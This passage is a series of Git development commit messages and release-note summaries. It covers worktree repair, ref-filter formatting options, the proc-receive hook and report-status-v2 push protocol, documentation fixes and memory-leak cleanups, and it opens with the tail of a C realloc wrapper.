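{
	void *ret;

	if (!size) {
		free(ptr);
		return sketch_xmalloc(0);
	}
	ret = realloc(ptr, size);
	if (!ret) {
		fprintf(stderr, "out of memory\n");
		exit(1);
	}
	return ret;
}
```

Since the zero-size case is handled before realloc() is reached, a NULL return from realloc() can only mean allocation failure, and the old pointer is neither freed twice nor leaked.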
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In fde97d8ac6 (Update documentation to remove incorrect GIT_DIFF_OPTS
example., 2006-11-27), the description of the 'GIT_EXTERNAL_DIFF'
variable was moved from 'diff-format.txt' to 'git.txt', and the
documentation was updated to remove a 'diff(1)' invocation since Git did
not use an external diff program anymore by default.
However, the description of 'GIT_EXTERNAL_DIFF' still mentions "instead
of the diff invocation described above", which is confusing.
Correct that outdated sentence.
Also, link to git(1) in 'diff-generate-patch.txt' when GIT_DIFF_OPTS and
GIT_EXTERNAL_DIFF are mentioned, so that users can easily know what
these variables are about.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Feeding "$ZERO_OID" to "git log --ignore-missing --stdin", and
running "git log --ignore-missing $ZERO_OID" fell back to start
digging from HEAD; it has been corrected to become a no-op, like
"git log --tags=no-tag-matches-this-pattern" does.
* jk/rev-input-given-fix:
revision: set rev_input_given in handle_revision_arg()
The description of --cached/--index options in "git apply --help"
has been updated.
* rp/apply-cached-doc:
git-apply.txt: update descriptions of --cached, --index
"git restore/checkout --no-overlay" with wildcarded pathspec
mistakenly removed matching paths in subdirectories, which has been
corrected.
* rs/checkout-no-overlay-pathspec-fix:
checkout, restore: make pathspec recursive
Accesses to two pseudorefs have been updated to properly use ref
API.
* hn/refs-pseudorefs:
sequencer: treat REVERT_HEAD as a pseudo ref
builtin/commit: suggest update-ref for pseudoref removal
sequencer: treat CHERRY_PICK_HEAD as a pseudo ref
refs: make refs_ref_exists public
Long ago, we decided to use 3 threads by default when running the
index-pack task in parallel, which has been adjusted a bit upwards.
* jk/index-pack-w-more-threads:
index-pack: adjust default threading cap
p5302: count up to online-cpus for thread tests
p5302: disable thread-count parameter tests by default
The parser for "git for-each-ref --format=..." was too loose when
parsing the "%(trailers...)" atom, and forgot that "trailers" and
"trailers:<modifiers>" are the only two allowed forms, which has
been corrected.
* hv/ref-filter-trailers-atom-parsing-fix:
ref-filter: 'contents:trailers' show error if `:` is missing
t6300: unify %(trailers) and %(contents:trailers) tests
Updates into a lazy/partial clone with a submodule did not work
well with transfer.fsckobjects set.
* jt/promisor-pack-fix:
fetch-pack: in partial clone, pass --promisor
The output from the "diff" family of the commands had abbreviated
object names of blobs involved in the patch, but its length was not
affected by the --abbrev option. Now it is.
* dd/diff-customize-index-line-abbrev:
diff: index-line: respect --abbrev in object's name
t4013: improve diff-post-processor logic
Add a separate 'match_missing' field for diff-index to use, and set it when we
encounter the "-m" option. This field won't then be cleared when another meaning of
"-m" is reverted (e.g., by "--no-diff-merges"), nor will it be affected by
future option(s) that might drive the 'ignore_merges' field.
Use this new field from diff-lib:do_oneway_diff() instead of reusing
'ignore_merges' field.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The intention of `git init --separate-git-dir=<path>` is to move the
.git/ directory to a location outside of the main worktree. When used
within a linked worktree, however, rather than moving the .git/
directory as intended, it instead incorrectly moves the worktree's
.git/worktrees/<id> directory to <path>, thus disconnecting the linked
worktree from its parent repository and breaking the worktree in the
process since its local .git file no longer points at a location at
which it can find the object database. Fix this broken behavior.
An intentional side-effect of this change is that it also closes a
loophole not caught by ccf236a23a (init: disallow --separate-git-dir
with bare repository, 2020-08-09) in which the check to prevent
--separate-git-dir being used in conjunction with a bare repository was
unable to detect the invalid combination when invoked from within a
linked worktree. Therefore, add a test to verify that this loophole is
closed, as well.
Reported-by: Henré Botha <henrebotha@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A linked worktree's .git file is a "gitfile" pointing at the
.git/worktrees/<id> directory within the repository. When `git init
--separate-git-dir=<path>` is used on an existing repository to relocate
the repository's .git/ directory to a different location, it neglects to
update the .git files of linked worktrees, thus breaking the worktrees
by making it impossible for them to locate the repository. Fix this by
teaching --separate-git-dir to repair the .git file of each linked
worktree to point at the new repository location.
Reported-by: Henré Botha <henrebotha@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .git/worktrees/<id>/gitdir file points at the location of a linked
worktree's .git file. Its content must be of the form
/path/to/worktree/.git (from which the location of the worktree itself
can be derived by stripping the "/.git" suffix). If the gitdir file is
deleted or becomes corrupted or outdated, then Git will be unable to
find the linked worktree. An easy way for the gitdir file to become
outdated is for the user to move the worktree manually (without using
"git worktree move"). Although it is possible to manually update the
gitdir file to reflect the new linked worktree location, doing so
requires a level of knowledge about worktree internals beyond what a
user should be expected to know offhand.
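The suffix rule described above can be sketched as follows. This is an illustrative Python model, not Git's C code; the helper name `worktree_from_gitdir` is hypothetical.

```python
from typing import Optional

def worktree_from_gitdir(content: str) -> Optional[str]:
    """Derive a worktree path from the text of a gitdir file (hypothetical helper)."""
    path = content.strip()          # tolerate a trailing newline
    suffix = "/.git"
    if not path.endswith(suffix):
        return None                 # corrupted or unexpected content
    return path[: -len(suffix)]     # strip the "/.git" suffix
```

A `None` result corresponds to the "corrupted" case, in which the worktree cannot be located from this file alone.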
Therefore, teach "git worktree repair" how to repair broken or outdated
.git/worktrees/<id>/gitdir files automatically. (For this to work, the
command must either be invoked from within the worktree whose gitdir
file requires repair, or from within the main or any linked worktree by
providing the path of the broken worktree as an argument to "git
worktree repair".)
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .git file in a linked worktree is a "gitfile" which points back to
the .git/worktrees/<id> entry in the main worktree or bare repository.
If a worktree's .git file is deleted or becomes corrupted or outdated,
then the linked worktree won't know how to find the repository or any of
its own administrative files (such as 'index', 'HEAD', etc.). An easy
way for the .git file to become outdated is for the user to move the
main worktree or bare repository. Although it is possible to manually
update each linked worktree's .git file to reflect the new repository
location, doing so requires a level of knowledge about worktree
internals beyond what a user should be expected to know offhand.
Therefore, teach "git worktree repair" how to repair broken or outdated
worktree .git files automatically. (For this to work, the command must
be invoked from within the main worktree or bare repository, or from
within a worktree which has not become disconnected from the repository
-- such as one which was created after the repository was moved.)
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The environment variable `GIT_SEQUENCE_EDITOR`, and the configuration
variable 'sequence.editor', which were added in 821881d88d ("rebase -i":
support special-purpose editor to edit insn sheet, 2011-10-17), are
mentioned in the `git config` man page but not anywhere else.
Include `config/sequencer.txt` in `git-rebase.txt`, so that both the
environment variable and the configuration setting are mentioned there.
Also, add `GIT_SEQUENCE_EDITOR` to the list of environment variables
in `git(1)`.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The names of the "Special-Use Mailboxes" in Gmail are localized
using the user's localization settings. Add a note to that effect
in `git imap-send`'s documentation, to make it easier for users to
configure their account.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a public service, it is unlikely that the Gmail server is configured
to throw a certificate that does not verify at the user.
Remove the `sslVerify=false` config from the Gmail example.
Also, comment it in the `example.com` example, and add a note to the
user explaining that they might want to uncomment it if they are having
trouble connecting. While at it, use an Asciidoc 'Note' section in the
Gmail example also.
Based-on-patch-by: Barbu Paul - Gheorghe <barbu.paul.gheorghe@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the 'Examples' subsection in the 'Configuration' section and move
these examples to the 'Examples' section. Also remove the 'Variables'
title since it is now useless.
Also, use appropriate Asciidoc syntax for configuration values, and
capitalize 'Gmail' properly.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's refactor the code by adding a new `write_in_file()` function
that opens a file, writes a message to it and closes it, along with
a wrapper for write mode.
This helper will be used in later steps and makes the code
simpler and easier to understand.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Following 'enum bisect_error' vocabulary, return variable 'res' is
always non-positive.
Let's use '-res' instead of 'abs(res)' to make the code clearer.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In cmd_bisect__helper() function, if an invalid or no
subcommand is passed there is a BUG.
BUG() out instead of returning an error.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a repository has an alternate object directory configured, callers
can traverse through each alternate's MIDX by walking the '->next'
pointer.
But, when 'prepare_multi_pack_index_one()' loads multiple MIDXs, it
places the new ones at the front of this pointer chain, not at the end.
This can be confusing for callers such as 'git repack -ad', causing test
failures like in t7700.6 with 'GIT_TEST_MULTI_PACK_INDEX=1'.
This occurs when dropping a pack known to the local MIDX with alternates
configured that have their own MIDX. Since the alternate's MIDX is
returned via 'get_multi_pack_index()', 'midx_contains_pack()' returns
true (which is correct, since it traverses through the '->next' pointer
to find the MIDX in the chain that does contain the requested object).
But, we call 'clear_midx_file()' on 'the_repository', which drops the
MIDX at the path of the first MIDX in the chain, which (in the case of
t7700.6) is the one in the alternate.
This patch addresses that by:
- placing the local MIDX first in the chain when calling
'prepare_multi_pack_index_one()', and
- introducing a new 'get_local_multi_pack_index()', which explicitly
returns the repository-local MIDX, if any.
Don't impose an additional order on the MIDX's '->next' pointer beyond
that the first item in the chain must be local if one exists so that we
avoid a quadratic insertion.
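The ordering rule above can be sketched as a small linked-list model. This is an illustrative Python sketch under stated assumptions, not the C implementation: the `Midx` class and the `add_midx` and `get_local_midx` names are hypothetical, and the sketch assumes the local MIDX is the first one loaded.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Midx:
    object_dir: str
    local: bool
    next: Optional["Midx"] = None

def add_midx(head: Optional[Midx], new: Midx) -> Midx:
    """Insert `new` in O(1) and return the head of the chain."""
    if head is None:
        return new
    # Splice right after the head: no walk to the tail is needed, and
    # the first MIDX loaded (assumed to be the local one) stays first.
    new.next = head.next
    head.next = new
    return head

def get_local_midx(head: Optional[Midx]) -> Optional[Midx]:
    """Only the head of the chain can be the repository-local MIDX."""
    return head if head is not None and head.local else None
```

Because each insertion is constant-time, loading N MIDXs stays linear; the cost is that the alternates end up in no particular order behind the head.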
Likewise, use 'get_local_multi_pack_index()' in
'remove_redundant_pack()' to fix the formerly broken t7700.6 when run
with 'GIT_TEST_MULTI_PACK_INDEX=1'.
Finally, note that the MIDX ordering invariant is only preserved by the
insertion order in 'prepare_packed_git()', which traverses through the
ODB's '->next' pointer, meaning we visit the local object store first.
This fragility makes this an undesirable long-term solution if more
callers are added, but it is acceptable for now since this is the only
caller.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The positional arguments are specified in this order: "bad" then "good".
To avoid confusion, the options above the positional arguments
are now specified in the same order. They can still be specified in any
order since they're options, not positional arguments.
Signed-off-by: Hugo Locurcio <hugo.locurcio@hugo.pro>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the missing "e" in "de". While it is possible in French to omit it,
that only occurs with an apostrophe and only when the next word starts
with a vowel or mute h, which is not the case here.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Acked-by: Jean-Noël Avila <jn.avila@free.fr>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, the 'subject' atom does not take any arguments. This commit
introduces the `sanitize` formatting option for the 'subject' atom.
`subject:sanitize` - print sanitized subject line, suitable for a filename.
e.g.
%(subject): "the subject line"
%(subject:sanitize): "the-subject-line"
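A rough sketch of what such sanitizing might look like is given below. The exact character set and trimming rules are not stated here, so the ones used in this sketch are assumptions, and `sanitize_subject` is a hypothetical name rather than Git's function.

```python
import re

def sanitize_subject(subject: str) -> str:
    """Approximate a filename-friendly form of a commit subject."""
    first_line = subject.split("\n", 1)[0]
    # Assumption: letters, digits, '.' and '_' are kept; any other run
    # of characters collapses into a single '-'.
    text = re.sub(r"[^A-Za-z0-9._]+", "-", first_line)
    # Assumption: a leading '-' and trailing '.' or '-' are dropped.
    return text.lstrip("-").rstrip(".-")
```

For the subject shown above, `sanitize_subject("the subject line")` yields `the-subject-line`.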
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function 'format_sanitized_subject()' is responsible for
producing the sanitized subject line in pretty.c
e.g.
the subject line
the-sanitized-subject-line
It would be a nice enhancement to `subject` atom to have the
same feature. So in the later commits, we plan to add this feature
to ref-filter.
Refactor `format_sanitized_subject()`, so it can be reused in
ref-filter.c for adding new modifier `sanitize` to "subject" atom.
Previously, the loop inside `format_sanitized_subject()` ran
until `\n` was found. Now the caller stores the first occurrence
of `\n` in a variable `eol` and passes it to
`format_sanitized_subject()`, and the loop runs up to `eol`.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sometimes, when using the 'parent' atom, a user might want to see an
abbreviated hash instead of the full 40-character hash.
Just like 'objectname', it might be convenient for users to have the
`:short` and `:short=<length>` option for printing 'parent' hash.
Let's introduce `short` option to 'parent' atom.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sometimes, when using the 'tree' atom, a user might want to see an
abbreviated hash instead of the full 40-character hash.
Just like 'objectname', it might be convenient for users to have the
`:short` and `:short=<length>` option for printing 'tree' hash.
Let's introduce `short` option to 'tree' atom.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In previous commits, we prepared some `objectname` related functions
for more generic usage, so that these functions can be used for `tree`
and `parent` atom.
But the names of some functions and fields may be misleading.
For example, the function `objectname_atom_parser()` implies that it is
only for the `objectname` atom.
Let's rename all such functions and fields.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we plan to use `grab_objectname()` for `tree` and `parent` atom,
it's better to parameterize the error messages in the function
`grab_objectname()` where "objectname" is hard coded.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Prepares `grab_objectname()` for more generic usage.
This change will allow us to reuse `grab_objectname()` for
the `tree` and `parent` atoms in a following commit.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, ref-filter only supports printing email with angle brackets.
Let's add support for two more email options.
- trim : for email without angle brackets.
- localpart : for the part before the @ sign out of trimmed email
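The two options can be illustrated with a small Python sketch. The `format_email` helper is hypothetical and only models the string handling described above; it is not ref-filter's code.

```python
def format_email(raw: str, option: str = "") -> str:
    """`raw` is the bracketed form, e.g. "<user@example.com>"."""
    if option == "":
        return raw                                  # default: keep angle brackets
    trimmed = raw[1:-1] if raw.startswith("<") and raw.endswith(">") else raw
    if option == "trim":
        return trimmed                              # no angle brackets
    if option == "localpart":
        return trimmed.split("@", 1)[0]             # part before the @ sign
    raise ValueError(f"unrecognized email option: {option}")
```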
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because the hook runs after the main checkout operation finishes, it
cannot affect what branch will be the current branch, what paths are
updated in the working tree, etc., which was described as "cannot
affect the outcome of 'checkout'".
However, the exit status of the hook is used as the exit status of
the 'checkout' command and is observable by anybody who spawned the
'checkout', which was missing from the documentation. Fix this.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The FETCH_HEAD is now always read from the filesystem regardless of
the ref backend in use, as its format is much richer than the
normal refs, and written directly by "git fetch" as a plain file.
* hn/refs-fetch-head-is-special:
refs: read FETCH_HEAD and MERGE_HEAD generically
refs: move gitdir into base ref_store
refs: fix comment about submodule ref_stores
refs: split off reading loose ref data in separate function
Command line completion (in contrib/) usually omits redundant,
deprecated and/or dangerous options from its output; it learned to
optionally include all of them.
* rz/complete-more-options:
completion: add GIT_COMPLETION_SHOW_ALL env var
parse-options: add --git-completion-helper-all
Code clean-up.
* jk/leakfix:
submodule--helper: fix leak of core.worktree value
config: fix leak in git_config_get_expiry_in_days()
config: drop git_config_get_string_const()
config: fix leaks from git_config_get_string_const()
checkout: fix leak of non-existent branch names
submodule--helper: use strbuf_release() to free strbufs
clear_pattern_list(): clear embedded hashmaps
API update.
* en/mem-pool:
mem-pool: use consistent pool variable name
mem-pool: use more standard initialization and finalization
mem-pool: add convenience functions for strdup and strndup
"git receive-pack" that accepts requests by "git push" learned to
outsource some of the ref updates to the new "proc-receive" hook.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Pushing to a pseudo reference (such as "refs/for/master/topic") may
create or update one or more references. The real names of the
references will be stored in the report options. Parse report options
to create or update remote-tracking branches properly.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to test update of remote-tracking branches for special refs,
add new "remote.origin.fetch" settings and test cases.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new multi-valued config variable "receive.procReceiveRefs"
for the `receive-pack` command, as follows:
git config --system --add receive.procReceiveRefs refs/for
git config --system --add receive.procReceiveRefs refs/drafts
If the specific prefix strings given by the config variables match the
reference names of the commands which are sent from git client to
`receive-pack`, these commands will be executed by an external hook
(named "proc-receive"), instead of the internal `execute_commands`
function.
For example, if it is set to "refs/for", pushing to a reference such as
"refs/for/master" will not create or update reference "refs/for/master",
but may create or update a pull request directly by running the hook
"proc-receive".
Optional modifiers can be provided in the beginning of the value to
filter commands for specific actions: create (a), modify (m),
delete (d). A `!` can be included in the modifiers to negate the
reference prefix entry. E.g.:
git config --system --add receive.procReceiveRefs ad:refs/heads
git config --system --add receive.procReceiveRefs !:refs/heads
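One plausible reading of these matching rules is sketched below in Python. The function names are hypothetical, and two details are assumptions not spelled out above: an entry with no action letters applies to all actions, and a prefix matches only at a "/" boundary.

```python
ZERO_OID = "0" * 40

def parse_entry(value):
    """Split e.g. "ad:refs/heads" into (actions, negate, prefix)."""
    modifiers, prefix = value.split(":", 1) if ":" in value else ("", value)
    negate = "!" in modifiers
    actions = set(modifiers) & set("amd")
    if not actions:                      # assumption: no letters means all actions
        actions = set("amd")
    return actions, negate, prefix.rstrip("/")

def action_of(old_oid, new_oid):
    if old_oid == ZERO_OID:
        return "a"                       # create
    if new_oid == ZERO_OID:
        return "d"                       # delete
    return "m"                           # modify

def goes_to_hook(entries, old_oid, new_oid, ref):
    """Would this command be handed to the "proc-receive" hook?"""
    action = action_of(old_oid, new_oid)
    for value in entries:
        actions, negate, prefix = parse_entry(value)
        if action not in actions:
            continue
        under_prefix = ref == prefix or ref.startswith(prefix + "/")
        if under_prefix != negate:       # plain match, or negated non-match
            return True
    return False
```

With the entry `ad:refs/heads`, creating or deleting `refs/heads/main` would go to the hook in this model, while an ordinary update of the same branch would not.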
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add ABNF notation for capability 'report-status-v2' which extends
capability 'report-status' by adding additional option lines.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The newly introduced "proc-receive" hook may handle a command for a
pseudo-reference with a zero-oid as its old-oid, while the hook may
create or update a reference with different name, different new-oid,
and different old-oid (the reference may exist already with a non-zero
old-oid). Current "report-status" protocol cannot report the status for
such reference rewrite.
Add a new capability "report-status-v2" and a new report protocol, which is
not backward compatible, for reporting the result of git-push.
If a user pushes to a pseudo-reference "refs/for/master/topic", and
"receive-pack" creates two new references "refs/changes/23/123/1" and
"refs/changes/24/124/1", then for a client without knowledge of
"report-status-v2", "receive-pack" will only send "ok/ng" directives in
the report, such as:
ok refs/for/master/topic
But for a client that knows about "report-status-v2",
"receive-pack" will use "option" directives to report more attributes
for the reference given by the preceding "ok/ng" directive:
ok refs/for/master/topic
option refname refs/changes/23/123/1
option new-oid <new-oid>
ok refs/for/master/topic
option refname refs/changes/24/124/1
option new-oid <new-oid>
The client will report the two newly created references to the end user.
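How a client might group these directives can be sketched in Python. This is a simplified model covering only the "ok", "ng" and "option" lines shown above; the `parse_report` and `reported_ref` names are hypothetical.

```python
def parse_report(lines):
    """Attach each "option" line to the preceding "ok"/"ng" line."""
    entries = []
    for line in lines:
        keyword, _, rest = line.partition(" ")
        if keyword == "ok":
            entries.append({"status": "ok", "ref": rest, "options": {}})
        elif keyword == "ng":
            ref, _, reason = rest.partition(" ")
            entries.append({"status": "ng", "ref": ref,
                            "reason": reason, "options": {}})
        elif keyword == "option" and entries:
            key, _, value = rest.partition(" ")
            entries[-1]["options"][key] = value
        else:
            raise ValueError(f"unexpected report line: {line!r}")
    return entries

def reported_ref(entry):
    """Prefer the rewritten name from "option refname" when present."""
    return entry["options"].get("refname", entry["ref"])
```

Applied to the report above, this yields two entries whose reported names are "refs/changes/23/123/1" and "refs/changes/24/124/1".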
Suggested-by: Junio C Hamano <gitster@pobox.com>
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When commands are fed to the "post-receive" hook, the report options are
parsed, and the real old-oid, new-oid and reference name are fed to
the "post-receive" hook.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git calls an internal `execute_commands` function to handle commands
sent from client to `git-receive-pack`. Regardless of what references
the user pushes, git creates or updates the corresponding references if
the user has write-permission. A contributor who has no
write-permission cannot push to the repository directly. So, the
contributor has to write commits to an alternate location, and send
pull requests by email or by other means. We call this a
distributed workflow.
In some cases it would be more convenient to work in a centralized
workflow like the one Gerrit provides. For example, a read-only user who
cannot push to a branch directly can run the following `git push`
command to push commits to a pseudo reference (one with the prefix
"refs/for/", not "refs/heads/") to create a code review.
git push origin \
HEAD:refs/for/<branch-name>/<session>
The `<branch-name>` in the above example can be as simple as "master",
or a more complicated branch name like "foo/bar". The `<session>` in
the above example command can be the local branch name of the client
side, such as "my/topic".
We cannot implement a centralized workflow elegantly by using
"pre-receive" + "post-receive", because Git will call the internal
function "execute_commands" to create references (even the special
pseudo reference) between these two hooks. Even though we can delete
the temporarily created pseudo reference via the "post-receive" hook,
having a temporary reference is not safe for concurrent pushes.
So, add a filter and a new handler to support this kind of workflow.
The filter will check the prefix of the reference name, and if the
command has a special reference name, the filter will turn a specific
field (`run_proc_receive`) on for the command. Commands with this field
turned on will be executed by a new handler (a hook named
"proc-receive") instead of the internal `execute_commands` function.
We can use this "proc-receive" command to create pull requests or send
emails for code review.
As suggested by Junio, this "proc-receive" hook reads the commands and
push-options (optional), and sends the result using a protocol in pkt-line
format. In the following example, the letter "S" stands for
"receive-pack" and letter "H" stands for the hook.
# Version and features negotiation.
S: PKT-LINE(version=1\0push-options atomic...)
S: flush-pkt
H: PKT-LINE(version=1\0push-options...)
H: flush-pkt
# Send commands from server to the hook.
S: PKT-LINE(<old-oid> <new-oid> <ref>)
S: ... ...
S: flush-pkt
# Send push-options only if the 'push-options' feature is enabled.
S: PKT-LINE(push-option)
S: ... ...
S: flush-pkt
# Receive result from the hook.
# OK, run this command successfully.
H: PKT-LINE(ok <ref>)
# NO, I reject it.
H: PKT-LINE(ng <ref> <reason>)
# Fall through, let 'receive-pack' execute it.
H: PKT-LINE(ok <ref>)
H: PKT-LINE(option fall-through)
# OK, but has an alternate reference. The alternate reference name
# and other status can be given in options
H: PKT-LINE(ok <ref>)
H: PKT-LINE(option refname <refname>)
H: PKT-LINE(option old-oid <old-oid>)
H: PKT-LINE(option new-oid <new-oid>)
H: PKT-LINE(option forced-update)
H: ... ...
H: flush-pkt
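The framing used in the exchange above can be sketched in Python. A pkt-line is a 4-digit hexadecimal length (counting the 4 length bytes themselves) followed by the payload, and a flush-pkt is the special value "0000". The `hook_reply_ok` helper is hypothetical and builds a complete reply for a single command only.

```python
FLUSH_PKT = b"0000"

def pkt_line(payload: bytes) -> bytes:
    """Prefix `payload` with its total length as 4 hex digits."""
    return b"%04x" % (len(payload) + 4) + payload

def hook_reply_ok(ref: str, options=()) -> bytes:
    """Frame "ok <ref>" plus its option lines, ending with a flush-pkt."""
    out = pkt_line(f"ok {ref}".encode())
    for opt in options:
        out += pkt_line(f"option {opt}".encode())
    return out + FLUSH_PKT
```

For example, `hook_reply_ok("refs/for/master/topic", ["fall-through"])` frames the "fall through" answer from the transcript.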
After receiving a command, the hook will execute the command, and may
create/update a different reference. For example, a command for a pseudo
reference "refs/for/master/topic" may create/update a different reference
such as "refs/pull/123/head". The alternate reference name and other
status are given in option lines.
The list of commands returned from "proc-receive" will replace the
relevant commands that are sent from user to "receive-pack", and
"receive-pack" will continue to run the "execute_commands" function and
other routines. Finally, the result of the execution of these commands
will be reported to end user.
The reporting function from "receive-pack" to "send-pack" will be
extended in a later commit, mirroring what the "proc-receive" hook reports
to "receive-pack".
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Topic "proc-receive-hook" will change the workflow and output of
git-push. Add some basic test cases in t5411 before introducing the new
topic.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pushing a new reference (not a head or tag), report it as a new
reference instead of a new branch.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'grep' check in test 4 of t7421 resulted in the failure of t7421 on
Windows due to a different error message
error: cannot spawn git: No such file or directory
instead of
fatal: exec 'rev-parse': cd to 'my-subm' failed: No such file or directory
Tighten up the check to compute 'src_abbrev' by guarding the
'verify_submodule_committish()' call using `p->status !='D'`, so that
the former isn't called in case of non-existent submodule directory,
consequently, there is no such error message on any execution
environment. The same need not be implemented for 'dst_abbrev' and is
rather redundant since the conditional 'if (S_ISGITLINK(p->mod_dst))'
already guards the 'verify_submodule_committish()' when we have a
status of 'D'.
Therefore, eliminate the 'grep' check in t7421. Instead, verify the
absence of an error message by doing a 'test_must_be_empty' on the
file containing the error.
Reported-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Worktree administrative files can become corrupted or outdated due to
external factors. Although it is often possible to recover from such
situations by hand-tweaking these files, doing so requires intimate
knowledge of worktree internals. While information necessary to make
such repairs manually can be obtained from git-worktree.txt and
gitrepository-layout.txt, we can assist users more directly by teaching
git-worktree how to repair its administrative files itself (at least to
some extent). Therefore, add a "git worktree repair" command which
attempts to correct common problems which may arise due to factors
beyond Git's control.
At this stage, the "repair" command is a mere skeleton; subsequent
commits will flesh out the functionality.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description suggested that --no-abbrev-commit negates --oneline as well as any
other option that implies --abbrev-commit. Fix it to say that it is --abbrev-commit
that is negated, not the option that implies it.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As child_process structure has an embedded strvec args for
formulating the command line, let's use it instead of using
an out-of-line argv[] whose length needs to be maintained
correctly.
Also, when spawning a git subcommand, omit it from the command list
and instead use the .git_cmd bit in the child_process structure.
